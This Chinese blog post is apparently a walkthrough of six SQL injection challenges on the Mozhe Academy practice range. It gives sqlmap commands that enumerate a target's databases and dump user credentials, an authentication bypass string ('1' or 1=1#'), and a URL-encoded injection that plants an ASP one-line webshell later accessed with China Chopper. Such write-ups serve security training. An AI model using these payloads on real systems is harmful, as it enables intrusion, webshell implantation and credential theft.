1. 程式人生 > >墨者學院 靶場練習(一) SQL注入

墨者學院 靶場練習(一) SQL注入

墨者學院 線上靶場

工具: sqlmap

第一題: SQL手工注入漏洞測試(MySQL資料庫-字元型)

利用工具 可以很快速注入,手工注入請看 https://blog.csdn.net/qq_42357070/article/details/81215715

 

進來點選公告

 

sqlmap 用於 mysql注入的步驟:

1:查詢資料庫

./sqlmap.py -u http://219.153.49.228:45569/new_list.php?id=tingjigonggao --dbs

      

返回5個數據庫,第二個 mozhe_discuz_stormgroup 是我們要找的資料庫

 

2:通過第一步找到的資料庫查詢表

 ./sqlmap.py -u http://219.153.49.228:45569/new_list.php?id=tingjigonggao -D mozhe_discuz_stormgroup --tables

  

返回2個表,使用者資訊表明顯在 stormgroup_member 表裡面

 

3:通過第二步找到的表查欄位列名

./sqlmap.py -u http://219.153.49.228:45569/new_list.php?id=tingjigonggao -D mozhe_discuz_stormgroup -T stormgroup_member --columns

  

欄位列名已經顯示出來,有我們需要的登入名 name 和密碼 password

4:獲取欄位的值

./sqlmap.py -u http://219.153.49.228:45569/new_list.php?id=tingjigonggao -D mozhe_discuz_stormgroup -T stormgroup_member -C id,name,password,status --dump

 

獲取帳號密碼成功,status 為1的可以登入

帳號是 mozhe  ,密碼是 0d3a3e696e5d90cbc1e5593ae5da4bfb  (MD5加密了,解密後為 277656 )

 

第二題:SQL注入漏洞測試(時間盲注)

點選進去後,url 引數新增 type

用sqlmap 跑,方法和上面第一個注入相同,只是比較慢,因為是時間盲注

得到flag是 mozhel

 

第三題:SQL過濾字元後手工注入漏洞測試(第3題)

另一篇文章寫,用手工注入:

https://mp.csdn.net/postedit/85157121

 

第四題:SQL過濾字元後手工繞過漏洞測試(萬能口令)

很簡單的一題

啟動靶場 後臺帳號 admin,密碼隨便填

登入顯示登入失敗,域名為 /no.php

改成  /yes.php  即可成功登入

這道題也可用 sqlmap 去跑,跑出來的帳號也可登入


第五題:SQL注入實戰(防注入)-Access

題目提醒很明顯

http://219.153.49.228:46553/news.asp?id=1 and 1=1 

用御劍後臺掃描工具 掃描,根據提醒,判斷出 提交資料 的資料寫入 sqlin.asp 檔案

寫入  asp  一句話木馬<%eval request("test")%>

http://219.153.49.228:46553/news.asp?id=1 and 1=<%eval request("test")%>

發現被過濾掉,使用 url encode 編碼

http://219.153.49.228:46553/news.asp?id=1%20and+1%3d%3C%25eval+request(%22test%22)%25%3E

寫入一句話木馬成功

用中國菜刀連線 ip/sqlin.asp  密碼 test

   

菜刀連線成功,獲取 key

 

第六題:SQL注入漏洞測試(登入繞過)

根據提示,用萬能登入密碼  1' or 1=1#